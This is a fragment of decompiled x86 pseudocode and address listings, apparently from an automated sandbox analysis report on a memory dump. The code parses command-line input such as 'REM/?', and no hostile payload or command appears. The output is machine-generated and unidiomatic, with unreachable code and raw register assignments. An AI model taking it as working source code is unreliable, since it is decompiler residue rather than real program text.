									if(__eax == 0) {
										L138:
										_pop(__esi);
										__edi = 0;
										__imp___wcsicmp(L"REM/?", __edi, __esi, __ecx);
										_pop(__ecx);
										__ecx = 0x120faa0;
										__eflags = __eax;
										if(__eflags == 0) {
											__eax = 0;
											__edi = 0;
											 *0x120faa6 = __ax;
											__edi = 1;
										}
										__ecx = 0x2d;
										__esi = E011DE9A0(__ecx, __eflags);
										__eflags = __edi;
										if(__edi != 0) {
											__eax = 0x2f;
											 *0x120faa0 = __ax;
											__eax = 0x3f;
											 *0x120faa2 = __ax;
											__eax = 0;
											 *0x120faa4 = __ax;
										} else {
											__ecx = 0;
											__eflags = 0;
											__eax = E011DF030(0);
										}
										__edx = 0x2d;
										__eax = E011DDCE1(__ebx, __edx, __edi);
										__eflags = __al;
										if(__al != 0) {
											__esi[0x1c] = __esi[0x1c] & 0x00000000;
											 *__esi = 0x3c;
											goto L95;
										} else {
											__edx = 0;
											__ecx = 0;
											__eax = E011DF300(__eax, 0, 0, 0);
											__eax = E011DEEC8();
											__eflags = __eax;
											if(__eax == 0) {
												L95:
												_pop(__edi);
												__eax = __esi;
												_pop(__esi);
												_pop(__ecx);
												return __esi;
											} else {
												__ecx = 0x20;
												__eax = E011DF030(__ecx);
												__eflags = __eax - 0x4000;
												if(__eax != 0x4000) {
													__edx = 0;
													__ecx = 0;
													__eax = E011DF300(__eax, 0, 0, 0);
													goto L95;
												} else {
													__eax =  *0x120fa8c;
													__ecx =  *0x120fa8c +  *0x120fa8c;
													__eax = E011E00B0(__ecx);
													__eflags = __eax;
													if(__eax == 0) {
														__eax = E011F9287(__ecx);
														__imp__longjmp(0x120b8b8, 1);
														asm("int3");
														__eflags = __esi;
														if(__esi != 0) {
															__eax = 0;
															 *__ebx = __ax;
														}
														_pop(__edi);
														_pop(__esi);
														__eax = __ebx;
														_pop(__ebx);
														return __ebx;
													} else {
														__edx =  *0x120fa8c;
														__ecx = __eax;
														__esi[0x1e] = __eax;
														__eax = E011E1040(__eax,  *0x120fa8c, 0x120faa0);
														goto L95;
													}
												}
											}
										}
									} else {
										__imp___wcsicmp(L"REM/?", 0x120faa0);
										__esp = __esp + 8;
										__eflags = __eax;
										if(__eax == 0) {
											goto L138;
										} else {
											_pop(__esi);
											_push(__ebp);
											__ebp = __esp;
											__esp = __esp - 0x14;
											_push(__ebx);
											_push(__esi);
											__eax =  &_v16;
											_v16 = 0;
											_push(__edi);
											__ecx = 0;
											__eflags = 0;
											_v12 =  &_v16;
											__ebx = E011DE9A0(0, 0);
											_v20 = __ebx;
											while(1) {
												__eax = E011DEEC8();
												__eflags = __eax;
												if(__eax == 0) {
													break;
												}
												__ecx = 1;
												__eax = E011DF030(1);
												__eflags = __eax - 0x4000;
												if(__eax == 0x4000) {
													__ecx = __ebx[0x1e];
													__edi =  *0x120fa8c;
													__eflags = __ecx;
													if(__ecx != 0) {
														__edx =  &(__ecx[1]);
														do {
															__ax =  *__ecx;
															__ecx =  &(__ecx[1]);
															__eflags = __ax;
														} while (__ax != 0);
														__ecx = __ecx - __edx;
														__edi = __edi + __ecx;
													}
													__ecx = __edi + __edi;
													__esi = E011E00B0(__ecx);
													_v8 = __esi;
													__eflags = __esi;
													if(__esi == 0) {
														__eax = E011F9287(__ecx);
														__imp__longjmp(0x120b8b8, 1);
														asm("int3");
														__eflags =  *0x120fa90;
														if( *0x120fa90 != 0) {
															__eax = E011F82EB(__ecx);
														}
														__eax = 0;
														__eflags = 0;
														__eflags =  *0x120fa88;
														 *0x11fd5c8 = 0;
														if( *0x120fa88 != 0) {
															__edx = 0;
															__ecx = __esi;
															__eax = E011F8121(__esi, 0);
														}
														__eax = __esi;
														_pop(__edi);
														_pop(__esi);
														_pop(__ebx);
														_pop(__ebp);
														return __eax;
													} else {
														__ecx = __ebx[0x1e];
														__eflags = __ecx;
														if(__ecx != 0) {
															__edx = __edi;
															__ecx = __esi;
															__eax = E011E1040(__esi, __edi, __esi);
														}
														__eax = 0;
														__eflags = __edi;
														if(__edi == 0) {
															L195:
															__eax = 0x80070057;
														} else {
															__eflags = __edi - 0x7fffffff;
															if(__edi > 0x7fffffff) {
																goto L195;
															}
														}
														__eflags = __eax;
														if(__eax < 0) {
															L198:
															__edx = 0;
														} else {
															__eax = 0;
															__ecx = __edi;
															__edx = __esi;
															__eflags = __edi;
															if(__edi == 0) {
																L197:
																__eax = 0x80070057;
																goto L198;
															} else {
																while(1) {
																	__eflags =  *__edx - __ax;
																	if( *__edx == __ax) {
																		break;
																	}
																	__edx =  &(__edx[1]);
																	__ecx = __ecx - 1;
																	__eflags = __ecx;
																	if(__ecx != 0) {
																		continue;
																	} else {
																		goto L197;
																	}
																	goto L114;
																}
																__eflags = __ecx;
																if(__ecx == 0) {
																	goto L197;
																} else {
																	__edx = __edi;
																	__edx = __edi - __ecx;
																	__eflags = __edx;
																}
															}
														}
														L114:
														__eflags = __eax;
														if(__eax >= 0) {
															__eax = _v8;
															__esi = __edi;
															__eax =  &(_v8[__edx]);
															__esi = __edi - __edx;
															__eflags = __esi;
															if(__esi == 0) {
																L120:
																__eax = __eax - 2;
															} else {
																__ecx = __esi;
																__edx =  &(__edx[0x3fffffff]);
																__ecx = __esi - __edi;
																__edi = 0x120faa0;
																__edx = __edx + __ecx;
																__edi = 0x120faa0 - __eax;
																__eflags = 0x120faa0;
																while(1) {
																	__eflags = __edx;
																	if(__edx == 0) {
																		break;
																	}
																	__ecx =  *(__edi + __eax) & 0x0000ffff;
																	__eflags = __cx;
																	if(__cx == 0) {
																		break;
																	} else {
																		 *__eax = __cx;
																		__edx = __edx - 1;
																		__eax =  &(__eax[1]);
																		__esi = __esi - 1;
																		__eflags = __esi;
																		if(__esi != 0) {
																			continue;
																		} else {
																			goto L120;
																		}
																	}
																	goto L122;
																}
																__eflags = __esi;
																if(__esi == 0) {
																	goto L120;
																}
															}
															L122:
															__esi = _v8;
															__ecx = 0;
															__eflags = 0;
															 *__eax = __cx;
														}
														__ebx[0x1e] = __esi;
														continue;
													}
												} else {
													__esi = _v12;
													__ecx = __esi;
													__eax = E011E02B0(__ebx, __esi, __edi, __esi);
													__eflags = __eax;
													if(__eax != 0) {
														__eax =  *__esi;
														do {
															_t77 =  &(__eax[0xa]); // 0x14
															__ebx = _t77;
															__eax =  *__ebx;
															_v12 = __ebx;
															__eflags = __eax;
														} while (__eax != 0);
														__ebx = _v20;
														continue;
													} else {
														__edx = 0;
														__ecx = 0;
														__eflags = 0;
														__eax = E011DF300(__eax, 0, 0, __eax);
														break;
													}
												}
												goto L218;
											}
											__eax = _v16;
											_pop(__edi);
											__ebx[0x1a] = _v16;
											__eax = __ebx;
											_pop(__esi);
											_pop(__ebx);
											__esp = __ebp;
											_pop(__ebp);
											return __ebx;
										}
									}
								}
							}
						}
					}
				}
				L218:
			}























                                    0x011e04a0
                                    0x011e04a0
                                    0x011e04ab
                                    0x011e0557
                                    0x011e055d
                                    0x011e0561
                                    0x011e05da
                                    0x011e05de
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011e0563
                                    0x011e0563
                                    0x011e0563
                                    0x011e056d
                                    0x011e056f
                                    0x011e0571
                                    0x011e852b
                                    0x011e8537
                                    0x011e853d
                                    0x011e853e
                                    0x011e8541
                                    0x011e8543
                                    0x011e8546
                                    0x011e8548
                                    0x011e8548
                                    0x011e854a
                                    0x011e854a
                                    0x011e854c
                                    0x011e854e
                                    0x011e854e
                                    0x011e8553
                                    0x011e8553
                                    0x011e8556
                                    0x011e855a
                                    0x011e8560
                                    0x011e8560
                                    0x011d480e
                                    0x011e0577
                                    0x011e0577
                                    0x011e057f
                                    0x011e05e9
                                    0x011e05ef
                                    0x011e0581
                                    0x011e0581
                                    0x011e0590
                                    0x011e0595
                                    0x011e059a
                                    0x011e059a
                                    0x011e05a8
                                    0x011e05aa
                                    0x011e05af
                                    0x011e05af
                                    0x011e05b9
                                    0x011e05bc
                                    0x011e05bf
                                    0x011e05d0
                                    0x011e05d3
                                    0x011e05c1
                                    0x011e05c6
                                    0x011e05cb
                                    0x011e05ce
                                    0x011e05e0
                                    0x011e05e0
                                    0x011e05e5
                                    0x011e05e8
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011e05ce
                                    0x011e05bf
                                    0x011e0571
                                    0x011e04b1
                                    0x011e04bb
                                    0x011e04c1
                                    0x011e04c4
                                    0x011e04c6
                                    0x011e05f3
                                    0x011e05f3
                                    0x011d9a34
                                    0x011d9a36
                                    0x011d9a3c
                                    0x011d9a3d
                                    0x011d9a3e
                                    0x011d9a40
                                    0x011f1093
                                    0x011f1095
                                    0x011f1097
                                    0x011f109d
                                    0x011f109d
                                    0x011d9a48
                                    0x011d9a49
                                    0x011d9a58
                                    0x011d9a5c
                                    0x011d9a5d
                                    0x011d9a5f
                                    0x011f10a3
                                    0x011f10ab
                                    0x011f10ac
                                    0x011f10b2
                                    0x011f10b4
                                    0x011d9a65
                                    0x011d9a65
                                    0x011d9a65
                                    0x011d9a67
                                    0x011d9a67
                                    0x011d9a6e
                                    0x011d9a6f
                                    0x011d9a74
                                    0x011d9a76
                                    0x011f10bf
                                    0x011f10c3
                                    0x011d9a7c
                                    0x011d9a7c
                                    0x011d9a80
                                    0x011d9a89
                                    0x011d9a8a
                                    0x011d9a8c
                                    0x011d9a8e
                                    0x011d9a8e
                                    0x011d9a8f
                                    0x011d9a99
                                    0x011d9a9f
                                    0x011d9aa0
                                    0x011d9aa1
                                    0x011d9aa3
                                    0x00000000
                                    0x00000000
                                    0x011d9aa9
                                    0x011d9ab3
                                    0x011d9ab9
                                    0x011d9aba
                                    0x011d9abb
                                    0x011d9abd
                                    0x011d9c3b
                                    0x011d9c19
                                    0x011d9c19
                                    0x011d9c1b
                                    0x011d9a8f
                                    0x011d9a99
                                    0x011d9a9f
                                    0x011d9aa0
                                    0x011d9aa1
                                    0x011d9aa3
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011d9aa3
                                    0x00000000
                                    0x011d9a8f
                                    0x011d9acd
                                    0x011d9ad3
                                    0x011d9ad4
                                    0x011d9ad5
                                    0x011d9ad7
                                    0x011d9bb9
                                    0x011d9bbd
                                    0x011d9bbf
                                    0x011d9bc4
                                    0x011d9bcc
                                    0x011d9bcd
                                    0x011d9bd0
                                    0x00000000
                                    0x011d9bd6
                                    0x011d9bd8
                                    0x011d9bd9
                                    0x011d9bdc
                                    0x00000000
                                    0x011d9be2
                                    0x011d9be2
                                    0x011d9be6
                                    0x011d9c46
                                    0x011d9c46
                                    0x011d9be8
                                    0x011d9bed
                                    0x011d9bf4
                                    0x011d9bf9
                                    0x011d9bfb
                                    0x00000000
                                    0x011d9c01
                                    0x011d9c01
                                    0x011d9c07
                                    0x00000000
                                    0x011d9c07
                                    0x011d9bfb
                                    0x011d9bdc
                                    0x00000000
                                    0x011d9add
                                    0x011d9ae7
                                    0x011d9aed
                                    0x011d9aee
                                    0x011d9aef
                                    0x011d9af2
                                    0x011d9af4
                                    0x011f10d1
                                    0x011f10d4
                                    0x011f10d6
                                    0x011f10db
                                    0x011f10df
                                    0x011f10e1
                                    0x011f10e1
                                    0x011f10e6
                                    0x011f10ee
                                    0x011f10ef
                                    0x011f10f2
                                    0x00000000
                                    0x011f10f8
                                    0x011f10fa
                                    0x011f10fb
                                    0x011f10fe
                                    0x00000000
                                    0x011f1104
                                    0x011f1104
                                    0x011f1109
                                    0x011f1110
                                    0x011f1115
                                    0x011f1117
                                    0x011f1127
                                    0x011f1127
                                    0x011f1132
                                    0x00000000
                                    0x011f1119
                                    0x011f1119
                                    0x011f111f
                                    0x011d9c0a
                                    0x011d9c0f
                                    0x011d9c11
                                    0x011d9c14
                                    0x00000000
                                    0x011d9c14
                                    0x011f1117
                                    0x011f10fe
                                    0x00000000
                                    0x011d9afa
                                    0x011d9afa
                                    0x011d9afc
                                    0x011d9afe
                                    0x011d9b01
                                    0x011d9c25
                                    0x011d9c28
                                    0x011d9c2e
                                    0x011d9c30
                                    0x011f1138
                                    0x011f1138
                                    0x011f113b
                                    0x011f1141
                                    0x011f1144
                                    0x011f114a
                                    0x011f114a
                                    0x011f1144
                                    0x011f113b
                                    0x011d9c30
                                    0x011d9c28
                                    0x011d9b01
                                    0x011d9afc
                                    0x011d9af4
                                    0x011d9b09
                                    0x00000000
                                    0x011d9c41
                                    0x011d9c41
                                    0x00000000
                                    0x011d9c41
                                    0x011d9a8f
                                    0x011d9b0a
                                    0x011d9b0a
                                    0x011d9b11
                                    0x011f1154
                                    0x011f1154
                                    0x011d9b17
                                    0x011d9b17
                                    0x011d9b1f
                                    0x011d9b25
                                    0x011d9b26
                                    0x011d9b28
                                    0x00000000
                                    0x011d9b2e
                                    0x011d9b2e
                                    0x011d9b35
                                    0x011d9b3a
                                    0x011d9b3d
                                    0x011d9b42
                                    0x011d9b44
                                    0x00000000
                                    0x011d9b4a
                                    0x011d9b4a
                                    0x011d9b51
                                    0x00000000
                                    0x00000000
                                    0x011d9b51
                                    0x011d9b44
                                    0x011d9b28
                                    0x011d9b57
                                    0x011d9b5a
                                    0x011d9b5f
                                    0x011d9b60
                                    0x011d9b63
                                    0x011d9b64
                                    0x011d9b69
                                    0x011d9b6e
                                    0x011d9b73
                                    0x011d9b76
                                    0x011d9b77
                                    0x011d9b7a
                                    0x011d9b7b
                                    0x011d9b80
                                    0x011d9b85
                                    0x011d9b8a
                                    0x011d9b8d
                                    0x011d9b92
                                    0x011d9b95
                                    0x011d9b98
                                    0x011d9b9b
                                    0x011d9b9c
                                    0x011d9ba3
                                    0x011d9ba4
                                    0x011d9ba9
                                    0x011d9bac
                                    0x011d9bae
                                    0x011f115e
                                    0x011f115e
                                    0x011d9bae
                                    0x011d9bb4
                                    0x011d9bb5
                                    0x011d9bb7
                                    0x011d9bb8
                                    0x011e04cc
                                    0x011e04d6
                                    0x011e04dc
                                    0x011e04df
                                    0x011e04e1
                                    0x00000000
                                    0x011e04e7
                                    0x011e04f1
                                    0x011e04f7
                                    0x011e04fa
                                    0x011e04fc
                                    0x011e05d4
                                    0x011e05d4
                                    0x011dd812
                                    0x011dd814
                                    0x011dd81a
                                    0x011dd81b
                                    0x011dd81c
                                    0x011dd81e
                                    0x011eb9cb
                                    0x011eb9cd
                                    0x011eb9cf
                                    0x011eb9d5
                                    0x011eb9d5
                                    0x011dd826
                                    0x011dd82c
                                    0x011dd82e
                                    0x011dd830
                                    0x011eb9dd
                                    0x011eb9de
                                    0x011eb9e6
                                    0x011eb9e7
                                    0x011eb9ed
                                    0x011eb9ef
                                    0x011dd836
                                    0x011dd836
                                    0x011dd836
                                    0x011dd838
                                    0x011dd838
                                    0x011dd83f
                                    0x011dd840
                                    0x011dd845
                                    0x011dd847
                                    0x011eb9fa
                                    0x011eb9fe
                                    0x00000000
                                    0x011dd84d
                                    0x011dd84d
                                    0x011dd84f
                                    0x011dd855
                                    0x011dd871
                                    0x011dd873
                                    0x011dd875
                                    0x011dd875
                                    0x011dd877
                                    0x011dd857
                                    0x011dd861
                                    0x011dd867
                                    0x011dd868
                                    0x011dd869
                                    0x011dd86b
                                    0x011dd919
                                    0x011dd91b
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011dd86b
                                    0x011dd87c
                                    0x011dd87e
                                    0x011dd883
                                    0x011dd886
                                    0x011dd888
                                    0x011dd88a
                                    0x011dd88c
                                    0x011dd921
                                    0x011dd924
                                    0x011dd932
                                    0x011dd932
                                    0x011dd926
                                    0x011dd926
                                    0x011dd88c
                                    0x011dd894
                                    0x011dd895
                                    0x011dd89a
                                    0x011dd89d
                                    0x011dd89f
                                    0x011eba09
                                    0x011eba09
                                    0x011dd8a5
                                    0x011dd8aa
                                    0x011dd8ac
                                    0x011dd8d7
                                    0x011dd8d7
                                    0x011dd8d8
                                    0x011dd8da
                                    0x011dd8db
                                    0x011dd8dc
                                    0x011dd8ae
                                    0x011dd8ae
                                    0x011dd8b0
                                    0x011dd8b5
                                    0x011dd8c0
                                    0x011dd8c6
                                    0x011dd8c7
                                    0x011dd8c8
                                    0x011dd8ca
                                    0x011dd8dd
                                    0x011dd8e2
                                    0x011dd8e5
                                    0x011dd8ea
                                    0x011dd8ec
                                    0x011eba13
                                    0x011eba1f
                                    0x011eba25
                                    0x011eba26
                                    0x011eba26
                                    0x011eba26
                                    0x011eba28
                                    0x011dda46
                                    0x011dda46
                                    0x011dda49
                                    0x011dda4b
                                    0x011dda4d
                                    0x00000000
                                    0x00000000
                                    0x011dd9f1
                                    0x011dd9f4
                                    0x011dd9f6
                                    0x011dd9f9
                                    0x011dd9f9
                                    0x011dd9fc
                                    0x011dd9ff
                                    0x011dd9ff
                                    0x011dda04
                                    0x011dda06
                                    0x011dda08
                                    0x011dda0d
                                    0x011dda10
                                    0x011dda14
                                    0x011dda19
                                    0x011dda1c
                                    0x011dda1e
                                    0x011dda21
                                    0x011dda23
                                    0x011dda26
                                    0x011dda26
                                    0x011dda29
                                    0x011dda2c
                                    0x011dda2c
                                    0x011dda31
                                    0x011dda33
                                    0x011dda35
                                    0x011dda36
                                    0x011dda39
                                    0x011dda3b
                                    0x011dda40
                                    0x00000000
                                    0x00000000
                                    0x011dda40
                                    0x011dda39
                                    0x011dda1c
                                    0x011dda4f
                                    0x011dda55
                                    0x011dda5b
                                    0x011dda5e
                                    0x011eba31
                                    0x011eba36
                                    0x00000000
                                    0x011dda64
                                    0x011dda66
                                    0x011dda67
                                    0x011dda6c
                                    0x011dda72
                                    0x011dda74
                                    0x011ddb8d
                                    0x011ddb8d
                                    0x011ddb8f
                                    0x011dda7a
                                    0x011dda7a
                                    0x011dda80
                                    0x011dda83
                                    0x011dda88
                                    0x011dda8b
                                    0x011dda8d
                                    0x011dda8d
                                    0x011dda90
                                    0x011dda92
                                    0x011dda98
                                    0x011dda98
                                    0x011dda9b
                                    0x011dda9b
                                    0x011dda9e
                                    0x00000000
                                    0x011ddaa4
                                    0x011ddaa6
                                    0x011ddaac
                                    0x011ddaad
                                    0x011ddaaf
                                    0x011eba90
                                    0x011eba90
                                    0x00000000
                                    0x011ddab5
                                    0x011ddab7
                                    0x011ddabd
                                    0x011ddabe
                                    0x011ddac1
                                    0x00000000
                                    0x011ddac7
                                    0x011ddac7
                                    0x011ddac9
                                    0x011ddace
                                    0x011ddad0
                                    0x011eba41
                                    0x011eba43
                                    0x011eba48
                                    0x011eba4a
                                    0x00000000
                                    0x011eba50
                                    0x011eba56
                                    0x011eba5c
                                    0x011eba5e
                                    0x011eba64
                                    0x011eba66
                                    0x00000000
                                    0x011eba6c
                                    0x011eba6e
                                    0x011eba7e
                                    0x011eba83
                                    0x011eba84
                                    0x011eba86
                                    0x00000000
                                    0x011eba86
                                    0x011eba66
                                    0x011ddad6
                                    0x011ddad6
                                    0x011ddad6
                                    0x011ddad8
                                    0x011ddadd
                                    0x011ddae0
                                    0x011ddae2
                                    0x011ebb26
                                    0x011ebb36
                                    0x011ebb3b
                                    0x011ebb3c
                                    0x011ebb3e
                                    0x011ebb43
                                    0x011ebb43
                                    0x011ebb48
                                    0x011ebb4b
                                    0x011ebb4e
                                    0x00000000
                                    0x011ddae8
                                    0x011ddae8
                                    0x011ddaea
                                    0x011ddaef
                                    0x011ddaef
                                    0x011ddaf2
                                    0x011ddaf6
                                    0x011ddb6d
                                    0x011ddb6f
                                    0x011ddb73
                                    0x011ddb76
                                    0x011ddb78
                                    0x011ddb7c
                                    0x011ddb7f
                                    0x011ddb84
                                    0x011ddb86
                                    0x00000000
                                    0x011ddb88
                                    0x00000000
                                    0x011ddb88
                                    0x011ddaf8
                                    0x011ddaf8
                                    0x011ddafd
                                    0x011ddafe
                                    0x011eba98
                                    0x011eba9d
                                    0x011ebaa2
                                    0x011ebaa8
                                    0x011ebaaa
                                    0x00000000
                                    0x011ebab0
                                    0x011ebab0
                                    0x011ebab5
                                    0x011ebaba
                                    0x011ebabc
                                    0x00000000
                                    0x011ebac2
                                    0x011ebac2
                                    0x011ebac5
                                    0x011ebac7
                                    0x011ebac9
                                    0x011ebac9
                                    0x011ebad9
                                    0x011ebadf
                                    0x011ebae1
                                    0x00000000
                                    0x011ebae7
                                    0x011ebae7
                                    0x011ebaea
                                    0x011ebaec
                                    0x011ebaee
                                    0x011ebaee
                                    0x011ebaf4
                                    0x011ebaf5
                                    0x00000000
                                    0x011ebaf5
                                    0x011ebae1
                                    0x011ebabc
                                    0x011ddb04
                                    0x011ddb07
                                    0x011ddb09
                                    0x011ddb0b
                                    0x011ddb11
                                    0x011ddb11
                                    0x011ddb17
                                    0x011ddb17
                                    0x011ddb1c
                                    0x011ddb22
                                    0x011ddb24
                                    0x011ebb89
                                    0x011ebb89
                                    0x011ebb8e
                                    0x011ebb94
                                    0x00000000
                                    0x011ddb2a
                                    0x011ddb2a
                                    0x011ddb2a
                                    0x011ddb2c
                                    0x011ebaff
                                    0x011ebb01
                                    0x011ebb03
                                    0x011ebb08
                                    0x011ebb0e
                                    0x011ebb10
                                    0x011ebb15
                                    0x011ebb18
                                    0x011ebb58
                                    0x011ebb58
                                    0x011ebb5f
                                    0x011ebb7c
                                    0x00000000
                                    0x011ebb1a
                                    0x011ebb1a
                                    0x011ebb1c
                                    0x00000000
                                    0x011ebb1c
                                    0x011ddb32
                                    0x011ddb32
                                    0x011ddb32
                                    0x011ddb34
                                    0x00000000
                                    0x011ddb3a
                                    0x011ddb3a
                                    0x011ddb40
                                    0x00000000
                                    0x011ddb40
                                    0x011ddb34
                                    0x011ddb2c
                                    0x011ddb24
                                    0x011ddafe
                                    0x011ddaf6
                                    0x011ddae2
                                    0x011ddad0
                                    0x011ddac1
                                    0x011ddaaf
                                    0x00000000
                                    0x011ddb43
                                    0x011ddb43
                                    0x011ddb46
                                    0x011ddb48
                                    0x011ddb48
                                    0x011dda9b
                                    0x011dda92
                                    0x011dda74
                                    0x011ddb50
                                    0x011ddb53
                                    0x011ddb59
                                    0x011ddb5a
                                    0x011ddb5d
                                    0x011ddb5f
                                    0x011ddb60
                                    0x011ddb61
                                    0x011ddb61
                                    0x011ddb63
                                    0x011ddb64
                                    0x011ddb69
                                    0x011ddb6b
                                    0x011ddb6c
                                    0x00000000
                                    0x011ddb6c
                                    0x011dd8f2
                                    0x011dd8f2
                                    0x011dd8f8
                                    0x011dd8fb
                                    0x011dd8fe
                                    0x011dd905
                                    0x011dd906
                                    0x011dd90b
                                    0x011dd90e
                                    0x011dd910
                                    0x011dd912
                                    0x011dd912
                                    0x00000000
                                    0x011dd910
                                    0x011dd8cc
                                    0x011dd8ce
                                    0x011dd8d0
                                    0x011dd8d0
                                    0x011dd8d2
                                    0x00000000
                                    0x011dd8d2
                                    0x011dd8ca
                                    0x011dd8ac
                                    0x011e0502
                                    0x011e050c
                                    0x011e0512
                                    0x011e0515
                                    0x011e0517
                                    0x00000000
                                    0x011e051d
                                    0x011e0527
                                    0x011e052d
                                    0x011e0530
                                    0x011e0532
                                    0x011e0551
                                    0x011e0551
                                    0x011dde5e
                                    0x011dde60
                                    0x011dde66
                                    0x011dde67
                                    0x011dde68
                                    0x011dde6a
                                    0x011ebca8
                                    0x011ebcaa
                                    0x011ebcac
                                    0x011ebcb2
                                    0x011ebcb2
                                    0x011dde72
                                    0x011dde78
                                    0x011dde7a
                                    0x011dde7c
                                    0x011ebcba
                                    0x011ebcbb
                                    0x011ebcc3
                                    0x011ebcc4
                                    0x011ebcca
                                    0x011ebccc
                                    0x011dde82
                                    0x011dde82
                                    0x011dde82
                                    0x011dde84
                                    0x011dde84
                                    0x011dde8b
                                    0x011dde8c
                                    0x011dde91
                                    0x011dde93
                                    0x011ebcd7
                                    0x011ebcdb
                                    0x00000000
                                    0x011dde99
                                    0x011dde9b
                                    0x011dde9d
                                    0x011dde9f
                                    0x011ddea4
                                    0x011ddea9
                                    0x011ddeab
                                    0x011ddee6
                                    0x011ddee6
                                    0x011ddee7
                                    0x011ddee9
                                    0x011ddeea
                                    0x011ddeeb
                                    0x011ddead
                                    0x011ddeaf
                                    0x011ddeb0
                                    0x011ddeb5
                                    0x011ddeba
                                    0x011ddeee
                                    0x011ddef0
                                    0x011ddef2
                                    0x00000000
                                    0x011ddebc
                                    0x011ddebc
                                    0x011ddec1
                                    0x011ddec4
                                    0x011ddec9
                                    0x011ddecb
                                    0x011ebce6
                                    0x011ebcf2
                                    0x011ebcf8
                                    0x011ebcf9
                                    0x011ebcfb
                                    0x011ebd01
                                    0x011ebd03
                                    0x011ebd03
                                    0x011ddfb0
                                    0x011ddfb1
                                    0x011ddfb2
                                    0x011ddfb4
                                    0x011ddfb5
                                    0x011dded1
                                    0x011dded1
                                    0x011dded7
                                    0x011ddede
                                    0x011ddee1
                                    0x00000000
                                    0x011ddee1
                                    0x011ddecb
                                    0x011ddeba
                                    0x011ddeab
                                    0x011e0534
                                    0x011e053e
                                    0x011e0544
                                    0x011e0547
                                    0x011e0549
                                    0x00000000
                                    0x011e054b
                                    0x011e054b
                                    0x011ded82
                                    0x011ded83
                                    0x011ded85
                                    0x011ded88
                                    0x011ded89
                                    0x011ded8a
                                    0x011ded8d
                                    0x011ded94
                                    0x011ded95
                                    0x011ded95
                                    0x011ded97
                                    0x011ded9f
                                    0x011deda1
                                    0x011deda4
                                    0x011deda4
                                    0x011deda9
                                    0x011dedab
                                    0x00000000
                                    0x00000000
                                    0x011dedad
                                    0x011dedb2
                                    0x011dedb7
                                    0x011dedbc
                                    0x011dede9
                                    0x011dedec
                                    0x011dedf2
                                    0x011dedf4
                                    0x011ec0ad
                                    0x011ec0b0
                                    0x011ec0b0
                                    0x011ec0b3
                                    0x011ec0b6
                                    0x011ec0b6
                                    0x011ec0bb
                                    0x011ec0bf
                                    0x011ec0bf
                                    0x011dedfa
                                    0x011dee02
                                    0x011dee04
                                    0x011dee07
                                    0x011dee09
                                    0x011ec0f7
                                    0x011ec103
                                    0x011ec109
                                    0x011ec10a
                                    0x011ec111
                                    0x011ec117
                                    0x011ec117
                                    0x011defe1
                                    0x011defe1
                                    0x011defe3
                                    0x011defea
                                    0x011defef
                                    0x011ec121
                                    0x011ec123
                                    0x011ec125
                                    0x011ec125
                                    0x011deff5
                                    0x011deff7
                                    0x011deff8
                                    0x011deff9
                                    0x011deffa
                                    0x011deffb
                                    0x011dee0f
                                    0x011dee0f
                                    0x011dee12
                                    0x011dee14
                                    0x011ec0c7
                                    0x011ec0c9
                                    0x011ec0cb
                                    0x011ec0cb
                                    0x011dee1a
                                    0x011dee1c
                                    0x011dee1e
                                    0x011ec0d5
                                    0x011ec0d5
                                    0x011dee24
                                    0x011dee24
                                    0x011dee2a
                                    0x00000000
                                    0x00000000
                                    0x011dee2a
                                    0x011dee30
                                    0x011dee32
                                    0x011ec0f0
                                    0x011ec0f0
                                    0x011dee38
                                    0x011dee38
                                    0x011dee3a
                                    0x011dee3c
                                    0x011dee3e
                                    0x011dee40
                                    0x011ec0eb
                                    0x011ec0eb
                                    0x00000000
                                    0x011dee46
                                    0x011dee46
                                    0x011dee46
                                    0x011dee49
                                    0x00000000
                                    0x00000000
                                    0x011ec0df
                                    0x011ec0e2
                                    0x011ec0e2
                                    0x011ec0e5
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011ec0e5
                                    0x011dee4f
                                    0x011dee51
                                    0x00000000
                                    0x011dee57
                                    0x011dee57
                                    0x011dee59
                                    0x011dee59
                                    0x011dee59
                                    0x011dee51
                                    0x011dee40
                                    0x011dee5b
                                    0x011dee5b
                                    0x011dee5d
                                    0x011dee5f
                                    0x011dee62
                                    0x011dee64
                                    0x011dee67
                                    0x011dee67
                                    0x011dee69
                                    0x011dee99
                                    0x011dee99
                                    0x011dee6b
                                    0x011dee6b
                                    0x011dee6d
                                    0x011dee73
                                    0x011dee75
                                    0x011dee7a
                                    0x011dee7c
                                    0x011dee7c
                                    0x011dee80
                                    0x011dee80
                                    0x011dee82
                                    0x00000000
                                    0x00000000
                                    0x011dee84
                                    0x011dee88
                                    0x011dee8b
                                    0x00000000
                                    0x011dee8d
                                    0x011dee8d
                                    0x011dee90
                                    0x011dee91
                                    0x011dee94
                                    0x011dee94
                                    0x011dee97
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011dee97
                                    0x00000000
                                    0x011dee8b
                                    0x011dee9e
                                    0x011deea0
                                    0x00000000
                                    0x00000000
                                    0x011deea0
                                    0x011deea2
                                    0x011deea2
                                    0x011deea5
                                    0x011deea5
                                    0x011deea7
                                    0x011deea7
                                    0x011deeaa
                                    0x00000000
                                    0x011deeaa
                                    0x011dedbe
                                    0x011dedbe
                                    0x011dedc1
                                    0x011dedc3
                                    0x011dedc8
                                    0x011dedca
                                    0x011deeb2
                                    0x011deeb4
                                    0x011deeb4
                                    0x011deeb4
                                    0x011deeb7
                                    0x011deeb9
                                    0x011deebc
                                    0x011deebc
                                    0x011deec0
                                    0x00000000
                                    0x011dedd0
                                    0x011dedd1
                                    0x011dedd3
                                    0x011dedd3
                                    0x011dedd5
                                    0x00000000
                                    0x011dedd5
                                    0x011dedca
                                    0x00000000
                                    0x011dedbc
                                    0x011dedda
                                    0x011deddd
                                    0x011dedde
                                    0x011dede1
                                    0x011dede3
                                    0x011dede4
                                    0x011dede5
                                    0x011dede7
                                    0x011dede8
                                    0x011dede8
                                    0x011e0549
                                    0x011e0532
                                    0x011e0517
                                    0x011e04fc
                                    0x011e04e1
                                    0x011e04c6
                                    0x00000000

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
